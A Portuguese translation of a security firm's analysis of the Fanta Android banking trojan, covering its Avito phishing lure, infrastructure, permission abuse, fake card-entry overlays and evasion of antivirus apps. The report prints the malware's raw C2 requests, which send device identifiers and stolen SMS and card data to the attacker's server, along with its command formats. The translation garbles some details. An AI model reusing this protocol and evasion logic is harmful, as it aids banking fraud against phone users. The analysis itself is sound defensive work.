Depois que você desejar vender algo no Avito e, após definir uma descrição detalhada do seu produto (por exemplo, um módulo de RAM), você receberá esta mensagem:
Ao abrir o link, você verá uma página bastante inócua que notifica você, um vendedor feliz e bem-sucedido, sobre a compra:
Depois de clicar no botão "Continuar", um arquivo APK com o ícone e o nome confiável será baixado para o seu dispositivo Android. Você instalou um aplicativo que, por algum motivo, solicitou direitos AccessibilityService, duas janelas apareceram e desapareceram rapidamente e ... É isso aí.
Você entra para verificar seu saldo, mas, por algum motivo, seu aplicativo bancário solicita novamente os detalhes do cartão. Depois de inserir os dados, acontece uma coisa terrível: por algum motivo que ainda não está claro para você, o dinheiro começa a desaparecer da sua conta. Você está tentando resolver o problema, mas seu telefone está resistindo: pressiona as teclas “Voltar” e “Casa”, não desliga e não permite ativar nenhuma proteção. Como resultado, você fica sem dinheiro, suas mercadorias não foram compradas, você está confuso e se pergunta: o que aconteceu?
A resposta é simples: você é vítima do Android Trojan Fanta, a família Flexnet. Como isso aconteceu? Vamos explicar agora.
Autores:
Andrey Polovinkin , Especialista Júnior em Análise de Código Malicioso,
Ivan Pisarev , Especialista em Análise de Código Malicioso.
Algumas estatísticas
Pela primeira vez, a família Trojan Flexnet Android ficou conhecida em 2015. Durante um período bastante longo de atividade, a família se expandiu para várias subespécies: Fanta, Limebot, Lipton, etc. O Trojan, bem como a infraestrutura associada a ele, não fica parado: novos esquemas de distribuição eficazes estão sendo desenvolvidos - no nosso caso, páginas de phishing de alta qualidade destinadas a um vendedor específico do usuário, e os desenvolvedores do Trojan seguem as tendências da moda na criação de vírus - adicionam novos recursos que permitem roubar com mais eficiência dinheiro de dispositivos infectados e ignorar mecanismos de proteção.
A campanha descrita neste artigo é direcionada a usuários da Rússia, um pequeno número de dispositivos infectados foi detectado na Ucrânia e menos ainda no Cazaquistão e na Bielorrússia.
Apesar de o Flexnet estar na arena dos cavalos de Tróia do Android há mais de 4 anos e ter sido estudado em detalhes por muitos pesquisadores, ele ainda está em boa forma. A partir de janeiro de 2019, a quantidade potencial de dano é superior a 35 milhões de rublos - e isso é apenas para campanhas na Rússia. Em 2015, várias versões deste trojan Android foram vendidas em fóruns underground, onde o código-fonte do trojan com uma descrição detalhada também pode ser encontrado. E isso significa que as estatísticas de danos no mundo são ainda mais impressionantes. Um bom indicador para um homem tão velho, certo?
Da venda à trapaça
Como você pode ver na captura de tela da página de phishing do serviço de Internet para colocar anúncios Avito apresentados anteriormente, ele foi preparado para uma vítima específica. Aparentemente, os atacantes usam um dos analisadores Avito, retirando o número de telefone e o nome do vendedor, além de uma descrição do produto. Depois que a página é expandida e o arquivo APK é preparado, uma mensagem SMS é enviada à vítima com seu nome e um link para a página de phishing contendo uma descrição de seu produto e o valor recebido pela “venda” do produto. Ao clicar no botão, o usuário recebe um arquivo APK malicioso - Fanta.
Um exame do domínio shcet491 [.] Ru mostrou que ele foi delegado nos servidores DNS da Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
O arquivo da zona de domínio contém entradas apontando para os endereços IP 31.220.23 [.] 236, 31.220.23 [.] 243 e 31.220.23 [.] 235. No entanto, o registro de recurso principal do domínio (registro A) aponta para um servidor com um endereço IP 178.132.1 [.] 240.
O endereço IP 178.132.1 [.] 240 está localizado na Holanda e pertence ao
hoster WorldStream. Os endereços IP 31.220.23 [.] 235, 31.220.23 [.] 236 e 31.220.23 [.] 243 estão localizados no Reino Unido e pertencem ao servidor de hospedagem compartilhado HOSTINGER.
O Openprov-ru é usado como registrador. Os seguintes domínios também foram resolvidos para o endereço IP 178.132.1 [.] 240:
- sdelka-ru [.] ru
- tovar-av [.] ru
- av-tovar [.] ru
- ru-sdelka [.] ru
- shcet382 [.] ru
- sdelka221 [.] ru
- sdelka211 [.] ru
- vyplata437 [.] ru
- viplata291 [.] ru
- perevod273 [.] ru
- perevod901 [.] ru
Note-se que quase todos os domínios tinham links com o seguinte formato:
http: // (www.) {0,1} <% domain%> / [0-9] {7}Um link de uma mensagem SMS também se enquadra nesse modelo. De acordo com dados históricos, verificou-se que um link corresponde a vários links de acordo com o modelo acima, o que indica o uso de um domínio para distribuir o cavalo de Troia a várias vítimas.
Vamos correr um pouco à frente: como servidor de controle, o Trojan baixado por meio de um link do SMS usa o endereço
onuseseddohap [.] Club . Este domínio foi registrado em 12/03/2019 e a partir de 29/04/2019, os aplicativos APK interagiram com este domínio. Com base nos dados recebidos do VirusTotal, um total de 109 aplicativos interagiram com este servidor. O próprio domínio foi resolvido para o endereço IP
217.23.14 [.] 27 , localizado na Holanda e de propriedade do
hoster WorldStream. O
namecheap é usado como registrador. Os domínios
bad-guaxinim [.] Club (a partir de 25/09/2018) e
bad-guaxinim [.] Live (a partir de 25/10/2018) também foram resolvidos para esse endereço IP. Mais de 80 arquivos APK interagiram com o domínio
bad-guaxinim [.] Club , mais de 100 interagiram com o domínio
bad-guaxinim [.] Live .
Em geral, o progresso do ataque é o seguinte:
O que a Fanta tem sob o capô?
Como muitos outros trojans do Android, o Fanta é capaz de ler e enviar mensagens SMS, fazer solicitações de USSD, mostrar suas próprias janelas sobre os aplicativos (incluindo os bancários). No entanto, chegou o arsenal de funcionalidades dessa família: a Fanta começou a usar o
AccessibilityService para diferentes propósitos: ler o conteúdo das notificações de outros aplicativos, impedir a detecção e interromper a execução do Trojan em um dispositivo infectado etc. O Fanta funciona em todas as versões do Android com menos de 4,4. Neste artigo, examinaremos mais de perto o seguinte exemplo do Fanta:
- MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Imediatamente após o lançamento
Imediatamente após o lançamento, o Trojan esconde seu ícone. A operação do aplicativo é possível apenas se o nome do dispositivo infectado não estiver na lista:
- android_x86
- Virtualbox
- Nexus 5X (cabeçalho)
- Nexus 5 (navalha)
Essa verificação é realizada no serviço principal do Trojan -
MainService . Na primeira partida, os parâmetros de configuração do aplicativo são inicializados com valores padrão (o formato de armazenamento dos dados de configuração e seus valores serão discutidos posteriormente), bem como o registro de um novo dispositivo infectado no servidor de gerenciamento. Uma solicitação HTTP POST será enviada ao servidor com o tipo de mensagem
register_bot e informações sobre o dispositivo infectado (versão Android, IMEI, número de telefone, nome da operadora e código do país da operadora na qual está registrada). O endereço do servidor é
hXXp: // onuseseddohap [.] Club / controller.php . Em resposta, o servidor envia uma mensagem contendo os campos
bot_id ,
bot_pwd ,
server - o aplicativo salva esses valores como parâmetros do servidor CnC. O parâmetro do
servidor é opcional se o campo não foi recebido: O Fanta usa o endereço de registro -
hXXp: // onuseseddohap [.] Club / controller.php . A função de alterar o endereço CnC pode ser usada para resolver dois problemas: distribuir uniformemente a carga entre vários servidores (com um grande número de dispositivos infectados, a carga em um servidor Web não otimizado pode ser alta) e também usar um servidor alternativo em caso de falha de um dos servidores CnC .
Se ocorreu um erro ao enviar a solicitação, o cavalo de Troia repetirá o processo de registro após 20 segundos.
Após o registro bem-sucedido do dispositivo, o Fanta exibirá a seguinte mensagem para o usuário:
Nota importante: um serviço chamado
System Security é o nome do serviço Trojan e, após clicar no botão
OK , uma janela é aberta com as configurações de Acessibilidade do dispositivo infectado, nas quais o usuário deve emitir direitos de acessibilidade para o serviço malicioso:
Assim que o usuário ativa o
AccessibilityService , o Fanta obtém acesso ao conteúdo das janelas do aplicativo e às ações executadas neles:
Imediatamente após receber os direitos de acessibilidade, o Trojan solicita direitos de administrador e o direito de ler notificações:
Usando o AccessibilityService, o aplicativo simula pressionamentos de tecla, concedendo a si mesmo todos os direitos necessários.
O Fanta cria várias instâncias de banco de dados (que serão descritas mais adiante) que são necessárias para salvar os dados de configuração, bem como informações sobre o dispositivo infectado coletado durante o processo. Para enviar as informações coletadas, o Trojan cria uma tarefa repetida projetada para descarregar campos do banco de dados e receber um comando do servidor de controle. O intervalo para acessar o CnC é definido dependendo da versão do Android: no caso de 5.1, o intervalo será de 10 segundos, caso contrário, 60 segundos.
Para receber um comando, o Fanta faz uma solicitação
GetTask ao servidor de gerenciamento. Em resposta, o CnC pode enviar um dos seguintes comandos:
A Fanta também coleta notificações de 70 aplicativos bancários, sistemas de pagamento rápido e carteiras eletrônicas e as armazena em um banco de dados.
Armazenamento de definições de configuração
Para armazenar parâmetros de configuração, o Fanta usa a abordagem padrão para a plataforma Android - arquivos de
preferências . As configurações serão salvas em um arquivo chamado
configurações . A descrição dos parâmetros salvos está na tabela abaixo.
O Fanta também usa o arquivo
smsManager :
Interação com o Banco de Dados
No processo de seu trabalho, o Trojan usa dois bancos de dados. Um banco de dados chamado
a é usado para armazenar várias informações coletadas do telefone. O segundo banco de dados é chamado
fanta.db e é usado para salvar as configurações responsáveis pela criação de janelas de phishing projetadas para coletar informações sobre cartões bancários.
O Trojan usa um banco de dados para armazenar as informações coletadas e registrar suas ações. Os dados são armazenados na tabela de
logs . Para criar uma tabela, use a seguinte consulta SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
O banco de dados contém as seguintes informações:
1. Efetuando logon na inclusão de um dispositivo infectado com a mensagem
Telefone ligado!2. Notificações de aplicativos. A mensagem é formada de acordo com o seguinte modelo:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dados do cartão bancário dos formulários de phishing do Trojan.
O parâmetro
VIEW_NAME pode ser um da lista:
- AliExpress
- Avito
- Google play
- Diversos <% Nome do aplicativo%>
A mensagem é registrada no formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Mensagens SMS recebidas / enviadas no formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%>
5. Informações sobre o pacote que cria a caixa de diálogo no formato:
(<%Package name%>)<%Package information%>
Tabela de
logs de exemplo:
Uma das características do Fanta é a coleta de informações do cartão bancário. A coleta de dados ocorre devido à criação de janelas de phishing ao abrir aplicativos bancários. O cavalo de Troia cria uma janela de phishing apenas uma vez. As informações que a janela foi mostrada ao usuário são armazenadas na tabela de
configurações no banco de dados
fanta.db . A seguinte consulta SQL é usada para criar o banco de dados:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Todos os campos da tabela de
configurações são inicializados por padrão para 1 (crie uma janela de phishing). Depois que o usuário digitar seus dados, o valor será definido como 0. Campos de exemplo da tabela de
configurações :
- can_login - o campo é responsável por mostrar o formulário ao abrir um aplicativo bancário
- first_bank - não usado
- can_avito - o campo é responsável por mostrar o formulário ao abrir o aplicativo Avito
- can_ali - o campo é responsável por mostrar o formulário ao abrir o aplicativo Aliexpress
- can_another - o campo é responsável por mostrar o formulário ao abrir qualquer aplicativo da lista: Yula, Pandao, Drome Auto, Carteira. Cartões de desconto e bônus, Aviasales, Booking, Trivago
- can_card - o campo é responsável por mostrar o formulário ao abrir o Google Play
Interação com o servidor de gerenciamento
A comunicação de rede com o servidor de gerenciamento ocorre via HTTP. O Fanta usa a popular biblioteca Retrofit para trabalhar com a rede. As solicitações são enviadas para
hXXp: // onuseseddohap [.] Club / controller.php . O endereço do servidor pode ser alterado durante o registro no servidor. Um cookie pode vir do servidor. O Fanta executa os seguintes pedidos do servidor:
- O bot é registrado no servidor de gerenciamento uma vez na primeira inicialização. Os seguintes dados sobre o dispositivo infectado são enviados ao servidor:
· Cookies - cookies recebidos do servidor (o valor padrão é uma string vazia)
· Modo - constante da string register_bot
Prefixo - constante inteira 2
· Version_sdk - gerado pelo seguinte padrão: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
Imei - IMEI do dispositivo infectado
· País - código do país em que o operador está registrado, no formato ISO
· Número - número de telefone
· Operador - nome do operador
Um exemplo de uma solicitação enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
Em resposta à solicitação, o servidor deve retornar um objeto JSON contendo os seguintes parâmetros:
· Bot_id - identificador do dispositivo infectado. Se bot_id for 0, o Fanta executará novamente a solicitação.
Bot_pwd - senha do servidor.
· Servidor - o endereço do servidor de gerenciamento. Parâmetro opcional. Se o parâmetro não for especificado, o endereço armazenado no aplicativo será usado.
Exemplo de objeto JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Solicite para receber um comando do servidor. Os seguintes dados são enviados ao servidor:
· Cookies - cookies recebidos do servidor
· Bid - ID do dispositivo infectado que foi recebido ao enviar a solicitação register_bot
· Pwd - senha para o servidor
· Divice_admin - o campo determina se os direitos de administrador foram obtidos. Se direitos de administrador foram obtidos, o campo é 1 , caso contrário, 0
· Acessibilidade - o status do Serviço de Acessibilidade. Se o serviço foi iniciado, o valor é 1 , caso contrário, 0
· SMSManager - mostra se o trojan está ativado como o aplicativo padrão para receber SMS
· Tela - exibe o estado da tela. Será definido como 1 se a tela estiver ligada, caso contrário, 0 ;
Um exemplo de uma solicitação enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Dependendo do comando, o servidor pode retornar um objeto JSON com parâmetros diferentes:
· Comando Enviar mensagem SMS : Os parâmetros contêm o número de telefone, o texto da mensagem SMS e o identificador da mensagem a ser enviada. O identificador é usado ao enviar uma mensagem para o servidor com o tipo setSmsStatus .
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· Faça uma chamada telefônica ou comando USSD : o número ou comando do telefone é fornecido no corpo da resposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· Comando Altere o parâmetro interval .
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· Comando Alterar parâmetro de interceptação .
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· O comando do campo Change SmsManager .
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· Comando Colete mensagens SMS de um dispositivo infectado .
{ "response": [ { "mode": 9 } ], "status":"ok" }
· Redefinir o telefone para o comando de configurações de fábrica :
{ "response": [ { "mode": 11 } ], "status":"ok" }
· Comando Alterar parâmetro ReadDialog .
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Enviando uma mensagem com o tipo setSmsStatus . Esta solicitação é realizada após o comando Enviar SMS . A solicitação é a seguinte:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Enviando conteúdo do banco de dados. Para uma solicitação, uma linha é transmitida. Os seguintes dados são enviados ao servidor:
· Cookies - cookies recebidos do servidor
· Modo - constante da string setSaveInboxSms
· Bid - ID do dispositivo infectado que foi recebido ao enviar a solicitação register_bot
· Texto - texto no registro atual do banco de dados (campo d da tabela de logs no banco de dados a )
· Número - nome do registro atual do banco de dados (o campo p dos logs da tabela no banco de dados a )
Sms_mode - valor inteiro (campo m dos logs da tabela no banco de dados a )
A solicitação é a seguinte:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Após o envio bem-sucedido ao servidor, a linha será excluída da tabela. Um exemplo do objeto JSON retornado pelo servidor:
{ "response":[], "status":"ok" }
Interação com o AccessibilityService
O AccessibilityService foi implementado para facilitar o uso de dispositivos Android por pessoas com deficiência. Na maioria dos casos, é necessária interação física para interagir com o aplicativo. AccessibilityService permite que você os faça por meio de programação. O Fanta usa o serviço para criar janelas falsas em aplicativos bancários e impedir a abertura das configurações do sistema e de alguns aplicativos.
Usando a funcionalidade do AccessibilityService, o trojan monitora as alterações nos elementos na tela de um dispositivo infectado. Como descrito anteriormente, nas configurações do Fanta há um parâmetro responsável pelo registro de operações com caixas de diálogo -
readDialog . Se esse parâmetro for definido, as informações sobre o nome e a descrição do pacote que acionou o evento serão adicionadas ao banco de dados. O cavalo de Troia executa as seguintes ações quando os eventos são disparados:
- Simula as teclas digitadas de volta para casa em caso de:
· Se o usuário quiser reiniciar o dispositivo
· Se o usuário quiser remover o aplicativo “Avito” ou alterar os direitos de acesso
· Se a página mencionar o aplicativo “Avito”
· Quando você abre o aplicativo “Google Play Protection”
· Ao abrir páginas com as configurações do AccessibilityService
· Quando a caixa de diálogo “System Security” aparecer
· Ao abrir a página com as configurações “Desenhe sobre outro aplicativo”
· Quando você abre a página “Aplicativos”, “Restaurar e redefinir”, “Redefinir dados”, “Redefinir configurações”, “Painel do desenvolvedor”, “Especial. Oportunidades ”,“ Acessibilidade ”,“ Direitos Especiais ”
· Se o evento foi gerado por determinados aplicativos.
Lista de aplicações- andróide
- Master lite
- Mestre limpo
- Mestre Limpo para CPU x86
- Gerenciamento de permissões do aplicativo Meizu
- Segurança MIUI
- Clean Master - Antivírus e cache de limpeza e lixo eletrônico
- Controles dos pais e GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock e Web Security Beta
- Limpador de vírus, Antivírus, Limpador (MAX Security)
- Mobile AntiVirus Security PRO
- Antivírus e proteção gratuita Avast 2019
- MegaFon de segurança móvel
- Proteção do AVG para Xperia
- Segurança Móvel
- Malwarebytes Antivírus e proteção
- Antivírus no Android 2019
- Mestre de Segurança - Antivírus, VPN, AppLock, Booster
- Antivírus do AVG para tablet Huawei System Manager
- Acessibilidade Samsung
- Samsung Smart Manager
- Mestre de segurança
- Speed booster
- Dr.Web
- Espaço de Segurança Dr.Web
- Centro de Controle Móvel Dr.Web
- Dr.Web Security Space Life
- Centro de Controle Móvel Dr.Web
- Antivírus e segurança móvel
- Kaspersky Internet Security: Antivírus e proteção
- Vida útil da bateria do Kaspersky: Economia e reforço
- Kaspersky Endpoint Security - proteção e gerenciamento
- AVG Antivirus grátis 2019 - Proteção para Android
- Antivírus para Android
- Norton Mobile Security e antivírus
- Antivírus, firewall, VPN, segurança móvel
- Segurança móvel: antivírus, VPN, anti-roubo
- Antivírus para Android
- Se a permissão for solicitada ao enviar uma mensagem SMS para um número curto, o Fanta imita clicar na caixa de seleção Lembrar seleção e enviar .
- Quando você tenta tirar os direitos de administrador do cavalo de Troia, ele bloqueia a tela do telefone.
- Impede a adição de novos administradores.
- Se o aplicativo antivírus dr.web detectar uma ameaça, o Fanta imita um clique no botão ignorar .
- Um cavalo de Tróia imita o clique em um botão de volta para casa, se um evento foi gerado pelo aplicativo Samsung Device Care .
- O Fanta cria janelas de phishing com formulários para inserir informações sobre cartões bancários se um aplicativo for iniciado a partir de uma lista que inclui cerca de 30 serviços diferentes da Internet. Entre eles: AliExpress, Booking, Avito, componente do Google Play Market, Pandao, Drome Auto, etc.
Formulários de phishing
O Fanta analisa quais aplicativos são executados no dispositivo infectado. Se um aplicativo de interesse foi aberto, o trojan mostra uma janela de phishing em cima de todos os outros, que é um formulário para inserir informações sobre um cartão bancário. O usuário deve inserir os seguintes dados:
- Número do cartão
- Data de validade do cartão
- CVV
- Nome do titular do cartão (não para todos os bancos)
Dependendo do aplicativo em execução, diferentes janelas de phishing serão mostradas. A seguir, exemplos de alguns deles:
Aliexpress:
Avito:
Para algumas outras aplicações, por exemplo, Google Play Market, Aviasales, Pandao, Booking, Trivago:
Como realmente foi
Felizmente, a pessoa que recebeu a mensagem SMS descrita no início do artigo acabou se especializando na área de segurança cibernética. Portanto, a versão real, não diretiva, difere da versão anterior: a pessoa recebeu um SMS interessante, após o qual o entregou à equipe de Inteligência de Caça de Ameaças do Grupo-IB. O resultado do ataque é este artigo. Final feliz, certo? No entanto, nem todas as histórias terminam tão bem e, para que a sua não se pareça com a versão de diretoria com perda de dinheiro, na maioria dos casos é suficiente aderir às seguintes regras descritas a longo prazo:
- não instale aplicativos para um dispositivo móvel com sistema operacional Android de outras fontes que não o Google Play
- ao instalar o aplicativo, preste atenção especial aos direitos solicitados pelo aplicativo
- preste atenção à extensão do arquivo
- instale regularmente atualizações do sistema operacional Android
- Não visite recursos suspeitos e não baixe arquivos de lá
- Não siga os links recebidos nas mensagens SMS.
O Grupo IB sabe tudo sobre crimes cibernéticos, mas conta as coisas mais interessantes.
O canal do Telegram, repleto de ação (https://t.me/Group_IB), sobre segurança da informação, hackers e ataques cibernéticos, hacktivistas e piratas da Internet. Investigações do crime cibernético sensacional por etapas, casos práticos usando as tecnologias do Grupo-IB e, é claro, recomendações sobre como evitar ser vítima na Internet.
Canal do YouTube aqui
Grupo-IB Photowire no Instagram www.instagram.com/group_ib
Notícias curtas do Twitter twitter.com/GroupIB
O Group-IB é um dos principais desenvolvedores de soluções para detectar e prevenir ataques cibernéticos, detectar fraudes e proteger a propriedade intelectual em uma rede sediada em Cingapura.